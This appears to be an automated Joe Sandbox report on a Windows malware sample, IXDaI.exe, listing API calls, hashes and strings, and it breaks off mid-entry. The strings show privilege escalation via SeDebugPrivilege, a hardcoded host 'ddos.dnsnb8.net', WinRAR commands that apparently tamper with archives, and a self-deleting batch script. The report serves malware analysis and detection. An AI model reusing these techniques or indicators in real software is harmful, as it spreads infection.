                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileTimememset
                                                                                      • String ID:
                                                                                      • API String ID: 176422537-0
                                                                                      • Opcode ID: 93a59c2309a2348f447c74844d3733523c0e2bb19b09d7325cac1ac9660c9e81
                                                                                      • Instruction ID: ae4eb8cdc49a99e26dc47f65d83b1add43a339747e4bcf402bc15af3dfdbc956
                                                                                      • Opcode Fuzzy Hash: 93a59c2309a2348f447c74844d3733523c0e2bb19b09d7325cac1ac9660c9e81
                                                                                      • Instruction Fuzzy Hash: B5F06832204209BBD770DE2ADC05BA777ECEB52761F008976F526D5050E730D646CBB0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 410 ba6159-ba615d 411 ba615f-ba6189 VirtualFree 410->411 412 ba618c-ba6192 411->412 413 ba6198-ba61b0 VirtualFree 412->413 414 ba60c7-ba60cf 412->414 415 ba61ba-ba61c8 413->415 416 ba61b2-ba61b4 413->416 414->412 417 ba60d5-ba60f8 VirtualAlloc 414->417 419 ba61ca-ba61d7 415->419 420 ba6243-ba6251 415->420 416->415 435 ba60fa-ba60fc call ba66c8 417->435 436 ba60fe-ba6106 417->436 424 ba61dd-ba61e0 419->424 422 ba6253 420->422 423 ba6264-ba626f 420->423 426 ba6255-ba6258 422->426 427 ba6271-ba6276 423->427 424->420 428 ba61e2-ba61f2 424->428 426->423 430 ba625a-ba6262 426->430 431 ba6389-ba63b1 VirtualProtect 427->431 432 ba627c-ba6289 427->432 433 ba61f5-ba61fe 428->433 430->426 434 ba63b7-ba63ba 431->434 452 ba628b 432->452 453 ba6292-ba6298 432->453 437 ba620c-ba6219 433->437 438 ba6200-ba6203 433->438 440 ba63fc-ba6416 VirtualProtect 434->440 441 ba63bc-ba63c2 434->441 435->436 443 ba6108-ba611d 436->443 444 ba6155 436->444 439 ba6238-ba623f 437->439 446 ba621b-ba6228 438->446 447 ba6205-ba6208 438->447 439->433 449 ba6241 439->449 457 ba6418-ba641d 440->457 458 ba6420-ba6425 440->458 441->441 448 ba63c4 441->448 450 ba611f-ba6121 443->450 444->411 446->439 454 ba622a-ba6236 447->454 455 ba620a 447->455 448->440 459 ba63c6-ba63cf 448->459 449->424 460 ba6123 450->460 461 ba6151-ba6154 450->461 452->453 456 ba62a2-ba62ac 453->456 454->439 455->439 462 ba62ae 456->462 463 ba62b1-ba62c8 456->463 464 ba63d1 459->464 465 ba63d4-ba63d8 459->465 460->461 466 ba6125-ba6128 460->466 461->444 462->463 467 ba62ce-ba62d4 463->467 468 ba6373-ba6384 463->468 464->465 469 ba63da 465->469 470 ba63dd-ba63e1 465->470 471 ba612a-ba612e 466->471 472 ba6134-ba613b 466->472 473 ba62da-ba62f1 467->473 474 ba62d6-ba62d9 467->474 468->427 469->470 475 ba63e3 470->475 476 ba63e7-ba63fa VirtualProtect 470->476 471->472 480 ba6130-ba6132 471->480 479 ba613d-ba614f 472->479 472->480 482 ba62f3-ba62f9 473->482 483 ba6365-ba636e 473->483 474->473 475->476 476->434 476->440 479->450 480->450 484 ba62fb-ba630f 482->484 485 ba6314-ba6326 482->485 483->456 486 ba6426-ba64a9 484->486 487 ba6328-ba634a 485->487 488 ba634c-ba6360 485->488 497 ba64ab-ba64c0 486->497 498 ba6519-ba651c 486->498 487->483 488->486 504 ba64c2 497->504 505 ba6535-ba6537 497->505 499 ba651d-ba651e 498->499 500 ba6583-ba6587 498->500 503 ba6522-ba6533 499->503 502 ba6588-ba658b 500->502 508 ba658d-ba658f 502->508 509 ba65a1-ba65a3 502->509 503->505 506 ba64f8 504->506 507 ba64c5-ba64cd 504->507 510 ba659a 505->510 511 ba6539 505->511 517 ba64fa-ba64fe 506->517 518 ba656c-ba656f 506->518 514 ba64cf-ba64d4 507->514 515 ba6542-ba6545 507->515 519 ba6591-ba6593 508->519 516 ba659b-ba659d 510->516 512 ba653b-ba6541 511->512 513 ba65b4 511->513 512->515 524 ba65be-ba6608 513->524 520 ba64d6-ba64d9 514->520 521 ba6517-ba6518 514->521 522 ba654d-ba6550 515->522 516->519 523 ba659f 516->523 525 ba6572 517->525 526 ba6500 517->526 518->525 519->516 527 ba6595 519->527 520->522 528 ba64db-ba64f5 520->528 521->498 522->524 529 ba6552-ba6556 522->529 523->502 530 ba6573-ba6576 525->530 526->503 531 ba6502 526->531 527->510 528->506 533 ba6578-ba657f 529->533 534 ba6558-ba6569 529->534 530->533 531->530 535 ba6504-ba6513 531->535 533->500 534->518 535->505 537 ba6515 535->537 537->521
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00BA60DF
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00BA6189
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BA61A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1852963964-0
                                                                                      • Opcode ID: 1981c711801823625026343c0e856ac1480f6424fe404ebc0d60c6a2be36368a
                                                                                      • Instruction ID: 0316d56e714a1b48523e5051bb44f53ed0c795bb1c3f36b57b0885b43ce4d71f
                                                                                      • Opcode Fuzzy Hash: 1981c711801823625026343c0e856ac1480f6424fe404ebc0d60c6a2be36368a
                                                                                      • Instruction Fuzzy Hash: B52149B1A08649CFCB718F68CC857DD3BE2EF46300F6D0469DE89AB291DA716950CB94
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,?,?,00BA13EF), ref: 00BA11AB
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028,00BA13EF,?,?,?,?,?,?,00BA13EF), ref: 00BA11BB
                                                                                      • AdjustTokenPrivileges.ADVAPI32(00BA13EF,00000000,?,00000010,00000000,00000000), ref: 00BA11EB
                                                                                      • CloseHandle.KERNEL32(00BA13EF), ref: 00BA11FA
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00BA13EF), ref: 00BA1203
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA11A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                      • API String ID: 75692138-699841801
                                                                                      • Opcode ID: f9ed31e420c9cfe4d045381df235568393c6b81389ea97a9b2adf0d76ed39222
                                                                                      • Instruction ID: 7730598c0ca1fbd9ba6b18dfc542816eb08f272d51420a915953b4727d619678
                                                                                      • Opcode Fuzzy Hash: f9ed31e420c9cfe4d045381df235568393c6b81389ea97a9b2adf0d76ed39222
                                                                                      • Instruction Fuzzy Hash: BC01E4B5900209FFDB10DFE8CD8AAAEBBF8FB05705F108469F606A2250DB719F449B50
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA13BC
                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00BA13DA
                                                                                      • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00BA1448
                                                                                        • Part of subcall function 00BA119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,?,?,00BA13EF), ref: 00BA11AB
                                                                                        • Part of subcall function 00BA119F: OpenProcessToken.ADVAPI32(00000000,00000028,00BA13EF,?,?,?,?,?,?,00BA13EF), ref: 00BA11BB
                                                                                        • Part of subcall function 00BA119F: AdjustTokenPrivileges.ADVAPI32(00BA13EF,00000000,?,00000010,00000000,00000000), ref: 00BA11EB
                                                                                        • Part of subcall function 00BA119F: CloseHandle.KERNEL32(00BA13EF), ref: 00BA11FA
                                                                                        • Part of subcall function 00BA119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00BA13EF), ref: 00BA1203
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA13A8
                                                                                      • SeDebugPrivilege, xrefs: 00BA13D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$SeDebugPrivilege
                                                                                      • API String ID: 4123949106-3534422503
                                                                                      • Opcode ID: 1a7e82e70b3c3942a36418f3ea4a553cc2aea81f2e2544bca0b32769bdbe11f3
                                                                                      • Instruction ID: 3140082f6acefb7fa272cf8c1ebf6835902875562a79ff74ffd06f1ad6725585
                                                                                      • Opcode Fuzzy Hash: 1a7e82e70b3c3942a36418f3ea4a553cc2aea81f2e2544bca0b32769bdbe11f3
                                                                                      • Instruction Fuzzy Hash: 1E314271D04209AAEF609FAD8C45FEEBBF9EB4A704F1044AAE505B2141DA309E45CF60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                                      • Instruction ID: 2b6a194041663f874a9a2b79956d05d56d0fcceb3f05418225b3322e3f34fd9d
                                                                                      • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                                      • Instruction Fuzzy Hash: 178182B1208B418FC728CF29C8906AAB7E2EFD6314F18C96DD4EAC7751D734A949CB54
                                                                                      APIs
                                                                                      • strstr.MSVCRT ref: 00BA23CC
                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BA2464
                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00BA2472
                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00BA24A8
                                                                                      • memset.MSVCRT ref: 00BA24B9
                                                                                      • strrchr.MSVCRT ref: 00BA24C9
                                                                                      • wsprintfA.USER32 ref: 00BA24DE
                                                                                      • strrchr.MSVCRT ref: 00BA24ED
                                                                                      • memset.MSVCRT ref: 00BA24F2
                                                                                      • memset.MSVCRT ref: 00BA2505
                                                                                      • wsprintfA.USER32 ref: 00BA2524
                                                                                      • Sleep.KERNEL32(000007D0), ref: 00BA2535
                                                                                      • Sleep.KERNEL32(000007D0), ref: 00BA255D
                                                                                      • memset.MSVCRT ref: 00BA256E
                                                                                      • wsprintfA.USER32 ref: 00BA2585
                                                                                      • memset.MSVCRT ref: 00BA25A6
                                                                                      • wsprintfA.USER32 ref: 00BA25CA
                                                                                      • Sleep.KERNEL32(000007D0), ref: 00BA25D0
                                                                                      • Sleep.KERNEL32(000007D0,?,?), ref: 00BA25E5
                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BA25FC
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00BA2611
                                                                                      • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00BA2642
                                                                                      • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00BA265B
                                                                                      • SetEndOfFile.KERNEL32 ref: 00BA266D
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00BA2676
                                                                                      • RemoveDirectoryA.KERNEL32(?), ref: 00BA2681
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                                      • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2203340711-2180922006
                                                                                      • Opcode ID: ad39cc514dbf1bca99bf22b9897374b5e67f65af7877b4c2c38c90e18f76aaf2
                                                                                      • Instruction ID: 941bcaf0ddf326dc7e7014a57c2b83e7b6cc0d4278569f3be620369315d155e5
                                                                                      • Opcode Fuzzy Hash: ad39cc514dbf1bca99bf22b9897374b5e67f65af7877b4c2c38c90e18f76aaf2
                                                                                      • Instruction Fuzzy Hash: 1381B271508304BBD7209F68DC85FABB7ECEB8AB14F00055AFA45D31A0DB74DA498B66
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00BA2766
                                                                                      • memset.MSVCRT ref: 00BA2774
                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00BA2787
                                                                                      • wsprintfA.USER32 ref: 00BA27AB
                                                                                        • Part of subcall function 00BA185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00BA1118), ref: 00BA1867
                                                                                        • Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1878
                                                                                        • Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1880
                                                                                        • Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1890
                                                                                        • Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1894
                                                                                      • wsprintfA.USER32 ref: 00BA27C6
                                                                                      • CopyFileA.KERNEL32(?,00BA4C80,00000000), ref: 00BA27D4
                                                                                      • wsprintfA.USER32 ref: 00BA27F4
                                                                                        • Part of subcall function 00BA1973: PathFileExistsA.SHLWAPI(00BA4E5C,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA1992
                                                                                        • Part of subcall function 00BA1973: CreateFileA.KERNEL32(00BA4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BA19BA
                                                                                        • Part of subcall function 00BA1973: Sleep.KERNEL32(00000064), ref: 00BA19C6
                                                                                        • Part of subcall function 00BA1973: wsprintfA.USER32 ref: 00BA19EC
                                                                                        • Part of subcall function 00BA1973: CopyFileA.KERNEL32(00BA4E5C,?,00000000), ref: 00BA1A00
                                                                                        • Part of subcall function 00BA1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA1A1E
                                                                                        • Part of subcall function 00BA1973: GetFileSize.KERNEL32(00BA4E5C,00000000), ref: 00BA1A2C
                                                                                        • Part of subcall function 00BA1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BA1A46
                                                                                        • Part of subcall function 00BA1973: ReadFile.KERNEL32(00BA4E5C,00BA4E60,00000000,?,00000000), ref: 00BA1A65
                                                                                      • DeleteFileA.KERNEL32(?,?,00BA4E54,00BA4E58), ref: 00BA281A
                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00BA4E54,00BA4E58), ref: 00BA2832
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                                      • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                                      • API String ID: 692489704-3256556265
                                                                                      • Opcode ID: 5e5ea4aac93ec186852458de47cb7b7e3efbc45d16cb886f6731c469f80241ae
                                                                                      • Instruction ID: 7c1eaf711e2a999588b253dcd1355b94fb2a9406c9b7e8bae55bb9630757531c
                                                                                      • Opcode Fuzzy Hash: 5e5ea4aac93ec186852458de47cb7b7e3efbc45d16cb886f6731c469f80241ae
                                                                                      • Instruction Fuzzy Hash: A02150B694431C7BDB10E7A49C8AFDB73ECEB46B54F0005E1B644E3051E7B49F448AA0
                                                                                      APIs
                                                                                        • Part of subcall function 00BA185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00BA1118), ref: 00BA1867
                                                                                        • Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1878
                                                                                        • Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1880
                                                                                        • Part of subcall function 00BA185B: srand.MSVCRT ref: 00BA1890
                                                                                        • Part of subcall function 00BA185B: rand.MSVCRT ref: 00BA1894
                                                                                      • wsprintfA.USER32 ref: 00BA15AA
                                                                                      • wsprintfA.USER32 ref: 00BA15C6
                                                                                      • lstrlen.KERNEL32(?), ref: 00BA15D2
                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00BA15EE
                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00BA1609
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00BA1612
                                                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00BA162D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                                      • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$open
                                                                                      • API String ID: 617340118-460878772
                                                                                      • Opcode ID: 6f121ce5aaa5ca1e13584b45b4aaba1f9ee79670bd0c10b3551d20d863f9e666
                                                                                      • Instruction ID: a3aaf969bff9112e615b2abbb623bc753eaec2ea07016dddee381331418fa5c5
                                                                                      • Opcode Fuzzy Hash: 6f121ce5aaa5ca1e13584b45b4aaba1f9ee79670bd0c10b3551d20d863f9e666
                                                                                      • Instruction Fuzzy Hash: 3D115176A051287AD76097A49C8AEEB7AECDF5BB60F000491F549E3050EA749B84CBB0
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00BA1400), ref: 00BA1226
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00BA122D
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00BA1400), ref: 00BA123F
                                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00BA1400), ref: 00BA1250
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00BA1400), ref: 00BA129E
                                                                                      • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00BA1400), ref: 00BA12B0
                                                                                      • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,00BA1400), ref: 00BA12F5
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00BA1400), ref: 00BA130A
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA1262
                                                                                      • ZwQuerySystemInformation, xrefs: 00BA1212
                                                                                      • ntdll.dll, xrefs: 00BA1219
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$ZwQuerySystemInformation$ntdll.dll
                                                                                      • API String ID: 1500695312-3489788173
                                                                                      • Opcode ID: 86e85546db5ab95673dbe983190f7a98011a9bae9a64e4cabbf03fae05ba3ac6
                                                                                      • Instruction ID: e73634bcd6974af16dfb014dbc0486fb0ee7d7876b4f5f949e64da2564fc7679
                                                                                      • Opcode Fuzzy Hash: 86e85546db5ab95673dbe983190f7a98011a9bae9a64e4cabbf03fae05ba3ac6
                                                                                      • Instruction Fuzzy Hash: FC21F071609311ABD7609F68CC09B6BBAE8FB87F00F000D69F645E7280CB70DA84C7A5
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00BA1118), ref: 00BA1867
                                                                                      • srand.MSVCRT ref: 00BA1878
                                                                                      • rand.MSVCRT ref: 00BA1880
                                                                                      • srand.MSVCRT ref: 00BA1890
                                                                                      • rand.MSVCRT ref: 00BA1894
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Timerandsrand$FileSystem
                                                                                      • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                      • API String ID: 4106363736-3273462101
                                                                                      • Opcode ID: 7104d0494818d2fe643de129b7d3ca2b5adc422b1115628e4ab15ef8511bb4b0
                                                                                      • Instruction ID: bac8a395bd2223f2a738c2477e8f14f76b72a6d370c0bbbe64d1a1eeaa80f47a
                                                                                      • Opcode Fuzzy Hash: 7104d0494818d2fe643de129b7d3ca2b5adc422b1115628e4ab15ef8511bb4b0
                                                                                      • Instruction Fuzzy Hash: FAE0D877A00218BBD710A7F9EC47D9EBBECDE85561B110527F600D3250E971FD448AB4
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,774CE800,?,?,00BA29DB,?,00000001), ref: 00BA26A7
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,774CE800,?,?,00BA29DB,?,00000001), ref: 00BA26B5
                                                                                      • lstrlen.KERNEL32(?), ref: 00BA26C4
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00BA26CE
                                                                                      • lstrcpy.KERNEL32(00000004,?), ref: 00BA26E3
                                                                                      • lstrcpy.KERNEL32(?,00000004), ref: 00BA271F
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00BA272D
                                                                                      • SetEvent.KERNEL32 ref: 00BA273C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 41106472-0
                                                                                      • Opcode ID: 38f89845555c739da2b24524c93e5aab05116549c75dcbc269bd6cb267439962
                                                                                      • Instruction ID: 6c4eb35f9d81bc699fed8557deebddfefc370411cc0e2822da67ab1a8b9aaf7c
